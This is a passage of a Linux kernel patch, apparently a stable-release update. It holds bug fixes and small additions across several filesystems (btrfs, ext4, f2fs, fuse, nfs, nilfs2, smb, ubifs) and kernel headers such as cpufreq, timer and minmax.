++++ b/fs/btrfs/volumes.c
+@@ -1444,7 +1444,7 @@ static bool contains_pending_extent(struct btrfs_device *device, u64 *start,
+ 
+ 		if (in_range(physical_start, *start, len) ||
+ 		    in_range(*start, physical_start,
+-			     physical_end - physical_start)) {
++			     physical_end + 1 - physical_start)) {
+ 			*start = physical_end + 1;
+ 			return true;
+ 		}
+diff --git a/fs/exec.c b/fs/exec.c
+index 39f7751c90fc3..b01434d6a512d 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -896,6 +896,7 @@ int transfer_args_to_stack(struct linux_binprm *bprm,
+ 			goto out;
+ 	}
+ 
++	bprm->exec += *sp_location - MAX_ARG_PAGES * PAGE_SIZE;
+ 	*sp_location = sp;
+ 
+ out:
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 6a3e27771df73..bc0ca45a5d817 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4684,10 +4684,16 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 			.fe_len = ac->ac_g_ex.fe_len,
+ 		};
+ 		loff_t orig_goal_end = extent_logical_end(sbi, &ex);
++		loff_t o_ex_end = extent_logical_end(sbi, &ac->ac_o_ex);
+ 
+-		/* we can't allocate as much as normalizer wants.
+-		 * so, found space must get proper lstart
+-		 * to cover original request */
++		/*
++		 * We can't allocate as much as normalizer wants, so we try
++		 * to get proper lstart to cover the original request, except
++		 * when the goal doesn't cover the original request as below:
++		 *
++		 * orig_ex:2045/2055(10), isize:8417280 -> normalized:0/2048
++		 * best_ex:0/200(200) -> adjusted: 1848/2048(200)
++		 */
+ 		BUG_ON(ac->ac_g_ex.fe_logical > ac->ac_o_ex.fe_logical);
+ 		BUG_ON(ac->ac_g_ex.fe_len < ac->ac_o_ex.fe_len);
+ 
+@@ -4699,7 +4705,7 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		 * 1. Check if best ex can be kept at end of goal and still
+ 		 *    cover original start
+ 		 * 2. Else, check if best ex can be kept at start of goal and
+-		 *    still cover original start
++		 *    still cover original end
+ 		 * 3. Else, keep the best ex at start of original request.
+ 		 */
+ 		ex.fe_len = ac->ac_b_ex.fe_len;
+@@ -4709,7 +4715,7 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 			goto adjust_bex;
+ 
+ 		ex.fe_logical = ac->ac_g_ex.fe_logical;
+-		if (ac->ac_o_ex.fe_logical < extent_logical_end(sbi, &ex))
++		if (o_ex_end <= extent_logical_end(sbi, &ex))
+ 			goto adjust_bex;
+ 
+ 		ex.fe_logical = ac->ac_o_ex.fe_logical;
+@@ -4717,7 +4723,6 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		ac->ac_b_ex.fe_logical = ex.fe_logical;
+ 
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+-		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
+ 		BUG_ON(extent_logical_end(sbi, &ex) > orig_goal_end);
+ 	}
+ 
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index f2ed15af703a8..38ce42396758d 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -1606,7 +1606,8 @@ static int ext4_flex_group_add(struct super_block *sb,
+ 		int gdb_num = group / EXT4_DESC_PER_BLOCK(sb);
+ 		int gdb_num_end = ((group + flex_gd->count - 1) /
+ 				   EXT4_DESC_PER_BLOCK(sb));
+-		int meta_bg = ext4_has_feature_meta_bg(sb);
++		int meta_bg = ext4_has_feature_meta_bg(sb) &&
++			      gdb_num >= le32_to_cpu(es->s_first_meta_bg);
+ 		sector_t padding_blocks = meta_bg ? 0 : sbi->s_sbh->b_blocknr -
+ 					 ext4_group_first_block_no(sb, 0);
+ 		sector_t old_gdb = 0;
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 5ae1c4aa3ae92..b54d681c6457d 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3000,6 +3000,7 @@ static inline void __mark_inode_dirty_flag(struct inode *inode,
+ 	case FI_INLINE_DOTS:
+ 	case FI_PIN_FILE:
+ 	case FI_COMPRESS_RELEASED:
++	case FI_ATOMIC_COMMITTED:
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ 	}
+ }
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index aa1ba2fdfe00d..205216c1db91f 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,6 +192,9 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
++	if (clean)
++		truncate_inode_pages_final(inode->i_mapping);
++
+ 	release_atomic_write_cnt(inode);
+ 	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+@@ -200,7 +203,6 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	F2FS_I(inode)->atomic_write_task = NULL;
+ 
+ 	if (clean) {
+-		truncate_inode_pages_final(inode->i_mapping);
+ 		f2fs_i_size_write(inode, fi->original_i_size);
+ 		fi->original_i_size = 0;
+ 	}
+diff --git a/fs/fat/nfs.c b/fs/fat/nfs.c
+index af191371c3529..bab63eeaf9cbc 100644
+--- a/fs/fat/nfs.c
++++ b/fs/fat/nfs.c
+@@ -130,6 +130,12 @@ fat_encode_fh_nostale(struct inode *inode, __u32 *fh, int *lenp,
+ 		fid->parent_i_gen = parent->i_generation;
+ 		type = FILEID_FAT_WITH_PARENT;
+ 		*lenp = FAT_FID_SIZE_WITH_PARENT;
++	} else {
++		/*
++		 * We need to initialize this field because the fh is actually
++		 * 12 bytes long
++		 */
++		fid->parent_i_pos_hi = 0;
+ 	}
+ 
+ 	return type;
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 5e408e7ec4c6b..936a24b646cef 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -399,6 +399,10 @@ int fuse_lookup_name(struct super_block *sb, u64 nodeid, const struct qstr *name
+ 		goto out_put_forget;
+ 	if (fuse_invalid_attr(&outarg->attr))
+ 		goto out_put_forget;
++	if (outarg->nodeid == FUSE_ROOT_ID && outarg->generation != 0) {
++		pr_warn_once("root generation should be zero\n");
++		outarg->generation = 0;
++	}
+ 
+ 	*inode = fuse_iget(sb, outarg->nodeid, outarg->generation,
+ 			   &outarg->attr, entry_attr_timeout(outarg),
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index a9681fecbd91f..253b9b78d6f13 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -923,7 +923,6 @@ static inline bool fuse_stale_inode(const struct inode *inode, int generation,
+ 
+ static inline void fuse_make_bad(struct inode *inode)
+ {
+-	remove_inode_hash(inode);
+ 	set_bit(FUSE_I_BAD, &get_fuse_inode(inode)->state);
+ }
+ 
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index f81000d968875..367e3b276092f 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -445,8 +445,11 @@ struct inode *fuse_iget(struct super_block *sb, u64 nodeid,
+ 	} else if (fuse_stale_inode(inode, generation, attr)) {
+ 		/* nodeid was reused, any I/O on the old inode should fail */
+ 		fuse_make_bad(inode);
+-		iput(inode);
+-		goto retry;
++		if (inode != d_inode(sb->s_root)) {
++			remove_inode_hash(inode);
++			iput(inode);
++			goto retry;
++		}
+ 	}
+ 	fi = get_fuse_inode(inode);
+ 	spin_lock(&fi->lock);
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 8fdb65e1b14a3..b555efca01d20 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -647,10 +647,17 @@ static void nfs_direct_commit_schedule(struct nfs_direct_req *dreq)
+ 	LIST_HEAD(mds_list);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
++	nfs_commit_begin(cinfo.mds);
+ 	nfs_scan_commit(dreq->inode, &mds_list, &cinfo);
+ 	res = nfs_generic_commit_list(dreq->inode, &mds_list, 0, &cinfo);
+-	if (res < 0) /* res == -ENOMEM */
+-		nfs_direct_write_reschedule(dreq);
++	if (res < 0) { /* res == -ENOMEM */
++		spin_lock(&dreq->lock);
++		if (dreq->flags == 0)
++			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++		spin_unlock(&dreq->lock);
++	}
++	if (nfs_commit_end(cinfo.mds))
++		nfs_direct_write_complete(dreq);
+ }
+ 
+ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index 6a06066684172..8e21caae4cae2 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -1656,7 +1656,7 @@ static int wait_on_commit(struct nfs_mds_commit_info *cinfo)
+ 				       !atomic_read(&cinfo->rpcs_out));
+ }
+ 
+-static void nfs_commit_begin(struct nfs_mds_commit_info *cinfo)
++void nfs_commit_begin(struct nfs_mds_commit_info *cinfo)
+ {
+ 	atomic_inc(&cinfo->rpcs_out);
+ }
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 4183819ea0829..84f26f281fe9f 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -842,7 +842,7 @@ DECLARE_EVENT_CLASS(nfsd_clid_class,
+ 		__array(unsigned char, addr, sizeof(struct sockaddr_in6))
+ 		__field(unsigned long, flavor)
+ 		__array(unsigned char, verifier, NFS4_VERIFIER_SIZE)
+-		__string_len(name, name, clp->cl_name.len)
++		__string_len(name, clp->cl_name.data, clp->cl_name.len)
+ 	),
+ 	TP_fast_assign(
+ 		__entry->cl_boot = clp->cl_clientid.cl_boot;
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index 40ce92a332fe7..146640f0607a3 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -724,7 +724,7 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+ 		dat = nilfs_bmap_get_dat(btree);
+ 		ret = nilfs_dat_translate(dat, ptr, &blocknr);
+ 		if (ret < 0)
+-			goto out;
++			goto dat_error;
+ 		ptr = blocknr;
+ 	}
+ 	cnt = 1;
+@@ -743,7 +743,7 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+ 			if (dat) {
+ 				ret = nilfs_dat_translate(dat, ptr2, &blocknr);
+ 				if (ret < 0)
+-					goto out;
++					goto dat_error;
+ 				ptr2 = blocknr;
+ 			}
+ 			if (ptr2 != ptr + cnt || ++cnt == maxblocks)
+@@ -781,6 +781,11 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+  out:
+ 	nilfs_btree_free_path(path);
+ 	return ret;
++
++ dat_error:
++	if (ret == -ENOENT)
++		ret = -EINVAL;  /* Notify bmap layer of metadata corruption */
++	goto out;
+ }
+ 
+ static void nilfs_btree_promote_key(struct nilfs_bmap *btree,
+diff --git a/fs/nilfs2/direct.c b/fs/nilfs2/direct.c
+index a35f2795b2422..8f802f7b0840b 100644
+--- a/fs/nilfs2/direct.c
++++ b/fs/nilfs2/direct.c
+@@ -66,7 +66,7 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 		dat = nilfs_bmap_get_dat(direct);
+ 		ret = nilfs_dat_translate(dat, ptr, &blocknr);
+ 		if (ret < 0)
+-			return ret;
++			goto dat_error;
+ 		ptr = blocknr;
+ 	}
+ 
+@@ -79,7 +79,7 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 		if (dat) {
+ 			ret = nilfs_dat_translate(dat, ptr2, &blocknr);
+ 			if (ret < 0)
+-				return ret;
++				goto dat_error;
+ 			ptr2 = blocknr;
+ 		}
+ 		if (ptr2 != ptr + cnt)
+@@ -87,6 +87,11 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 	}
+ 	*ptrp = ptr;
+ 	return cnt;
++
++ dat_error:
++	if (ret == -ENOENT)
++		ret = -EINVAL;  /* Notify bmap layer of metadata corruption */
++	return ret;
+ }
+ 
+ static __u64
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index f625872321cca..8eb4288d46fe0 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -112,7 +112,7 @@ int nilfs_get_block(struct inode *inode, sector_t blkoff,
+ 					   "%s (ino=%lu): a race condition while inserting a data block at offset=%llu",
+ 					   __func__, inode->i_ino,
+ 					   (unsigned long long)blkoff);
+-				err = 0;
++				err = -EAGAIN;
+ 			}
+ 			nilfs_transaction_abort(inode->i_sb);
+ 			goto out;
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index fd082151c5f9b..86fe433b1d324 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -218,7 +218,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		.tcon = tcon,
+ 		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access =  FILE_READ_DATA | FILE_READ_ATTRIBUTES,
++		.desired_access =  FILE_READ_DATA | FILE_READ_ATTRIBUTES |
++				   FILE_READ_EA,
+ 		.disposition = FILE_OPEN,
+ 		.fid = pfid,
+ 	};
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 66d25d0e34d8b..39fc078284c8e 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5757,15 +5757,21 @@ static int set_file_allocation_info(struct ksmbd_work *work,
+ 
+ 	loff_t alloc_blks;
+ 	struct inode *inode;
++	struct kstat stat;
+ 	int rc;
+ 
+ 	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+ 		return -EACCES;
+ 
++	rc = vfs_getattr(&fp->filp->f_path, &stat, STATX_BASIC_STATS,
++			 AT_STATX_SYNC_AS_STAT);
++	if (rc)
++		return rc;
++
+ 	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
+ 	inode = file_inode(fp->filp);
+ 
+-	if (alloc_blks > inode->i_blocks) {
++	if (alloc_blks > stat.blocks) {
+ 		smb_break_all_levII_oplock(work, fp, 1);
+ 		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+ 				   alloc_blks * 512);
+@@ -5773,7 +5779,7 @@ static int set_file_allocation_info(struct ksmbd_work *work,
+ 			pr_err("vfs_fallocate is failed : %d\n", rc);
+ 			return rc;
+ 		}
+-	} else if (alloc_blks < inode->i_blocks) {
++	} else if (alloc_blks < stat.blocks) {
+ 		loff_t size;
+ 
+ 		/*
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index 10c1779af9c51..f7b1f9ece1364 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -261,9 +261,6 @@ static int write_begin_slow(struct address_space *mapping,
+ 				return err;
+ 			}
+ 		}
+-
+-		SetPageUptodate(page);
+-		ClearPageError(page);
+ 	}
+ 
+ 	if (PagePrivate(page))
+@@ -462,9 +459,6 @@ static int ubifs_write_begin(struct file *file, struct address_space *mapping,
+ 				return err;
+ 			}
+ 		}
+-
+-		SetPageUptodate(page);
+-		ClearPageError(page);
+ 	}
+ 
+ 	err = allocate_budget(c, page, ui, appending);
+@@ -474,10 +468,8 @@ static int ubifs_write_begin(struct file *file, struct address_space *mapping,
+ 		 * If we skipped reading the page because we were going to
+ 		 * write all of it, then it is not up to date.
+ 		 */
+-		if (skipped_read) {
++		if (skipped_read)
+ 			ClearPageChecked(page);
+-			ClearPageUptodate(page);
+-		}
+ 		/*
+ 		 * Budgeting failed which means it would have to force
+ 		 * write-back but didn't, because we set the @fast flag in the
+@@ -568,6 +560,9 @@ static int ubifs_write_end(struct file *file, struct address_space *mapping,
+ 		goto out;
+ 	}
+ 
++	if (len == PAGE_SIZE)
++		SetPageUptodate(page);
++
+ 	if (!PagePrivate(page)) {
+ 		attach_page_private(page, (void *)1);
+ 		atomic_long_inc(&c->dirty_pg_cnt);
+diff --git a/include/drm/drm_modeset_helper_vtables.h b/include/drm/drm_modeset_helper_vtables.h
+index fafa70ac1337f..6f19cf5c210e5 100644
+--- a/include/drm/drm_modeset_helper_vtables.h
++++ b/include/drm/drm_modeset_helper_vtables.h
+@@ -896,7 +896,8 @@ struct drm_connector_helper_funcs {
+ 	 *
+ 	 * RETURNS:
+ 	 *
+-	 * The number of modes added by calling drm_mode_probed_add().
++	 * The number of modes added by calling drm_mode_probed_add(). Return 0
++	 * on failures (no modes) instead of negative error codes.
+ 	 */
+ 	int (*get_modes)(struct drm_connector *connector);
+ 
+diff --git a/include/linux/cpufreq.h b/include/linux/cpufreq.h
+index d5595d57f4e53..9d208648c84d5 100644
+--- a/include/linux/cpufreq.h
++++ b/include/linux/cpufreq.h
+@@ -1023,6 +1023,18 @@ static inline int cpufreq_table_find_index_c(struct cpufreq_policy *policy,
+ 						   efficiencies);
+ }
+ 
++static inline bool cpufreq_is_in_limits(struct cpufreq_policy *policy, int idx)
++{
++	unsigned int freq;
++
++	if (idx < 0)
++		return false;
++
++	freq = policy->freq_table[idx].frequency;
++
++	return freq == clamp_val(freq, policy->min, policy->max);
++}
++
+ static inline int cpufreq_frequency_table_target(struct cpufreq_policy *policy,
+ 						 unsigned int target_freq,
+ 						 unsigned int relation)
+@@ -1056,7 +1068,8 @@ static inline int cpufreq_frequency_table_target(struct cpufreq_policy *policy,
+ 		return 0;
+ 	}
+ 
+-	if (idx < 0 && efficiencies) {
++	/* Limit frequency index to honor policy->min/max */
++	if (!cpufreq_is_in_limits(policy, idx) && efficiencies) {
+ 		efficiencies = false;
+ 		goto retry;
+ 	}
+diff --git a/include/linux/gfp.h b/include/linux/gfp.h
+index 65a78773dccad..e2ccb47c42643 100644
+--- a/include/linux/gfp.h
++++ b/include/linux/gfp.h
+@@ -341,6 +341,15 @@ bool gfp_pfmemalloc_allowed(gfp_t gfp_mask);
+ extern void pm_restrict_gfp_mask(void);
+ extern void pm_restore_gfp_mask(void);
+ 
++/*
++ * Check if the gfp flags allow compaction - GFP_NOIO is a really
++ * tricky context because the migration might require IO.
++ */
++static inline bool gfp_compaction_allowed(gfp_t gfp_mask)
++{
++	return IS_ENABLED(CONFIG_COMPACTION) && (gfp_mask & __GFP_IO);
++}
++
+ extern gfp_t vma_thp_gfp_mask(struct vm_area_struct *vma);
+ 
+ #ifdef CONFIG_PM_SLEEP
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 646f1da9f27e0..4fbd5d8417111 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -164,8 +164,28 @@ struct hv_ring_buffer {
+ 	u8 buffer[];
+ } __packed;
+ 
++
++/*
++ * If the requested ring buffer size is at least 8 times the size of the
++ * header, steal space from the ring buffer for the header. Otherwise, add
++ * space for the header so that is doesn't take too much of the ring buffer
++ * space.
++ *
++ * The factor of 8 is somewhat arbitrary. The goal is to prevent adding a
++ * relatively small header (4 Kbytes on x86) to a large-ish power-of-2 ring
++ * buffer size (such as 128 Kbytes) and so end up making a nearly twice as
++ * large allocation that will be almost half wasted. As a contrasting example,
++ * on ARM64 with 64 Kbyte page size, we don't want to take 64 Kbytes for the
++ * header from a 128 Kbyte allocation, leaving only 64 Kbytes for the ring.
++ * In this latter case, we must add 64 Kbytes for the header and not worry
++ * about what's wasted.
++ */
++#define VMBUS_HEADER_ADJ(payload_sz) \
++	((payload_sz) >=  8 * sizeof(struct hv_ring_buffer) ? \
++	0 : sizeof(struct hv_ring_buffer))
++
+ /* Calculate the proper size of a ringbuffer, it must be page-aligned */
+-#define VMBUS_RING_SIZE(payload_sz) PAGE_ALIGN(sizeof(struct hv_ring_buffer) + \
++#define VMBUS_RING_SIZE(payload_sz) PAGE_ALIGN(VMBUS_HEADER_ADJ(payload_sz) + \
+ 					       (payload_sz))
+ 
+ struct hv_ring_buffer_info {
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 45910aebc3778..6645259be1438 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -102,6 +102,7 @@ enum {
+ 	ATA_DFLAG_NCQ_SEND_RECV = (1 << 19), /* device supports NCQ SEND and RECV */
+ 	ATA_DFLAG_NCQ_PRIO	= (1 << 20), /* device supports NCQ priority */
+ 	ATA_DFLAG_NCQ_PRIO_ENABLED = (1 << 21), /* Priority cmds sent to dev */
++	ATA_DFLAG_RESUMING	= (1 << 22),  /* Device is resuming */
+ 	ATA_DFLAG_INIT_MASK	= (1 << 24) - 1,
+ 
+ 	ATA_DFLAG_DETACH	= (1 << 24),
+diff --git a/include/linux/minmax.h b/include/linux/minmax.h
+index 5433c08fcc685..1aea34b8f19bf 100644
+--- a/include/linux/minmax.h
++++ b/include/linux/minmax.h
+@@ -51,6 +51,23 @@
+  */
+ #define max(x, y)	__careful_cmp(x, y, >)
+ 
++/**
++ * umin - return minimum of two non-negative values
++ *   Signed types are zero extended to match a larger unsigned type.
++ * @x: first value
++ * @y: second value
++ */
++#define umin(x, y)	\
++	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, <)
++
++/**
++ * umax - return maximum of two non-negative values
++ * @x: first value
++ * @y: second value
++ */
++#define umax(x, y)	\
++	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, >)
++
+ /**
+  * min3 - return minimum of three values
+  * @x: first value
+diff --git a/include/linux/nfs_fs.h b/include/linux/nfs_fs.h
+index 7931fa4725612..ac7d799d9d387 100644
+--- a/include/linux/nfs_fs.h
++++ b/include/linux/nfs_fs.h
+@@ -582,6 +582,7 @@ int nfs_wb_folio_cancel(struct inode *inode, struct folio *folio);
+ extern int  nfs_commit_inode(struct inode *, int);
+ extern struct nfs_commit_data *nfs_commitdata_alloc(void);
+ extern void nfs_commit_free(struct nfs_commit_data *data);
++void nfs_commit_begin(struct nfs_mds_commit_info *cinfo);
+ bool nfs_commit_end(struct nfs_mds_commit_info *cinfo);
+ 
+ static inline bool nfs_have_writebacks(const struct inode *inode)
+diff --git a/include/linux/phy/tegra/xusb.h b/include/linux/phy/tegra/xusb.h
+index 70998e6dd6fdc..6ca51e0080ec0 100644
+--- a/include/linux/phy/tegra/xusb.h
++++ b/include/linux/phy/tegra/xusb.h
+@@ -26,6 +26,7 @@ void tegra_phy_xusb_utmi_pad_power_down(struct phy *phy);
+ int tegra_phy_xusb_utmi_port_reset(struct phy *phy);
+ int tegra_xusb_padctl_get_usb3_companion(struct tegra_xusb_padctl *padctl,
+ 					 unsigned int port);
++int tegra_xusb_padctl_get_port_number(struct phy *phy);
+ int tegra_xusb_padctl_enable_phy_sleepwalk(struct tegra_xusb_padctl *padctl, struct phy *phy,
+ 					   enum usb_device_speed speed);
+ int tegra_xusb_padctl_disable_phy_sleepwalk(struct tegra_xusb_padctl *padctl, struct phy *phy);
+diff --git a/include/linux/ring_buffer.h b/include/linux/ring_buffer.h
+index 3c7d295746f67..3e7bfc0f65aee 100644
+--- a/include/linux/ring_buffer.h
++++ b/include/linux/ring_buffer.h
+@@ -98,6 +98,7 @@ __ring_buffer_alloc(unsigned long size, unsigned flags, struct lock_class_key *k
+ 	__ring_buffer_alloc((size), (flags), &__key);	\
+ })
+ 
++typedef bool (*ring_buffer_cond_fn)(void *data);
+ int ring_buffer_wait(struct trace_buffer *buffer, int cpu, int full);
+ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 			  struct file *filp, poll_table *poll_table, int full);
+diff --git a/include/linux/timer.h b/include/linux/timer.h
+index 648f00105f588..6d18f04ad7039 100644
+--- a/include/linux/timer.h
++++ b/include/linux/timer.h
+@@ -183,12 +183,20 @@ extern int timer_reduce(struct timer_list *timer, unsigned long expires);
+ extern void add_timer(struct timer_list *timer);
+ 
+ extern int try_to_del_timer_sync(struct timer_list *timer);
++extern int timer_delete_sync(struct timer_list *timer);
+ 
+-#if defined(CONFIG_SMP) || defined(CONFIG_PREEMPT_RT)
+-  extern int del_timer_sync(struct timer_list *timer);
+-#else
+-# define del_timer_sync(t)		del_timer(t)
+-#endif
++/**
++ * del_timer_sync - Delete a pending timer and wait for a running callback
++ * @timer:	The timer to be deleted
++ *
++ * See timer_delete_sync() for detailed explanation.
++ *
++ * Do not use in new code. Use timer_delete_sync() instead.
++ */
++static inline int del_timer_sync(struct timer_list *timer)
++{
++	return timer_delete_sync(timer);
++}
+ 
+ #define del_singleshot_timer_sync(t) del_timer_sync(t)
+ 
+diff --git a/include/linux/vfio.h b/include/linux/vfio.h
+index fdd393f70b198..5e7bf143cb223 100644
+--- a/include/linux/vfio.h
++++ b/include/linux/vfio.h
+@@ -268,6 +268,7 @@ struct virqfd {
+ 	wait_queue_entry_t		wait;
+ 	poll_table		pt;
+ 	struct work_struct	shutdown;
++	struct work_struct	flush_inject;
+ 	struct virqfd		**pvirqfd;
+ };
+ 
+@@ -275,5 +276,6 @@ int vfio_virqfd_enable(void *opaque, int (*handler)(void *, void *),
+ 		       void (*thread)(void *, void *), void *data,
+ 		       struct virqfd **pvirqfd, int fd);
+ void vfio_virqfd_disable(struct virqfd **pvirqfd);
++void vfio_virqfd_flush_thread(struct virqfd **pvirqfd);
+ 
+ #endif /* VFIO_H */
+diff --git a/include/media/media-entity.h b/include/media/media-entity.h
+index 28c9de8a1f348..03bb0963942bd 100644
+--- a/include/media/media-entity.h
++++ b/include/media/media-entity.h
+@@ -205,6 +205,7 @@ enum media_pad_signal_type {
+  * @graph_obj:	Embedded structure containing the media object common data
+  * @entity:	Entity this pad belongs to
+  * @index:	Pad index in the entity pads array, numbered from 0 to n
++ * @num_links:	Number of links connected to this pad
+  * @sig_type:	Type of the signal inside a media pad
+  * @flags:	Pad flags, as defined in
+  *		:ref:`include/uapi/linux/media.h <media_header>`
+@@ -216,6 +217,7 @@ struct media_pad {
+ 	struct media_gobj graph_obj;	/* must be first field in struct */
+ 	struct media_entity *entity;
+ 	u16 index;
++	u16 num_links;
+ 	enum media_pad_signal_type sig_type;
+ 	unsigned long flags;
+ 
+diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h
+index d8d8719315fd8..5f7f28c9edcb6 100644
+--- a/include/net/cfg802154.h
++++ b/include/net/cfg802154.h
+@@ -267,6 +267,7 @@ struct ieee802154_llsec_key {
+ 
+ struct ieee802154_llsec_key_entry {
+ 	struct list_head list;
++	struct rcu_head rcu;
+ 
+ 	struct ieee802154_llsec_key_id id;
+ 	struct ieee802154_llsec_key *key;
+diff --git a/include/scsi/scsi_driver.h b/include/scsi/scsi_driver.h
+index 4ce1988b2ba01..f40915d2eceef 100644
+--- a/include/scsi/scsi_driver.h
++++ b/include/scsi/scsi_driver.h
+@@ -12,6 +12,7 @@ struct request;
+ struct scsi_driver {
+ 	struct device_driver	gendrv;
+ 
++	int (*resume)(struct device *);
+ 	void (*rescan)(struct device *);
+ 	blk_status_t (*init_command)(struct scsi_cmnd *);
+ 	void (*uninit_command)(struct scsi_cmnd *);
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index 71def41b1ad78..149b63e3534ad 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -752,6 +752,7 @@ extern int __must_check scsi_add_host_with_dma(struct Scsi_Host *,
+ 					       struct device *,
+ 					       struct device *);
+ extern void scsi_scan_host(struct Scsi_Host *);
++extern int scsi_resume_device(struct scsi_device *sdev);
+ extern int scsi_rescan_device(struct scsi_device *sdev);
+ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+diff --git a/init/Kconfig b/init/Kconfig
+index ffb927bf6034f..b63dce6706c5c 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -902,14 +902,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11+ array-bounds globally.
++# Currently, disable gcc-10+ array-bounds globally.
+ # It's still broken in gcc-13, so no upper bound yet.
+-config GCC11_NO_ARRAY_BOUNDS
++config GCC10_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 100000 && GCC10_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/init/initramfs.c b/init/initramfs.c
+index 2f5bfb7d76521..7b915170789da 100644
+--- a/init/initramfs.c
++++ b/init/initramfs.c
+@@ -680,7 +680,7 @@ static void __init populate_initrd_image(char *err)
+ 
+ 	printk(KERN_INFO "rootfs image is not initramfs (%s); looks like an initrd\n",
+ 			err);
+-	file = filp_open("/initrd.image", O_WRONLY | O_CREAT, 0700);
++	file = filp_open("/initrd.image", O_WRONLY|O_CREAT|O_LARGEFILE, 0700);
+ 	if (IS_ERR(file))
+ 		return;
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
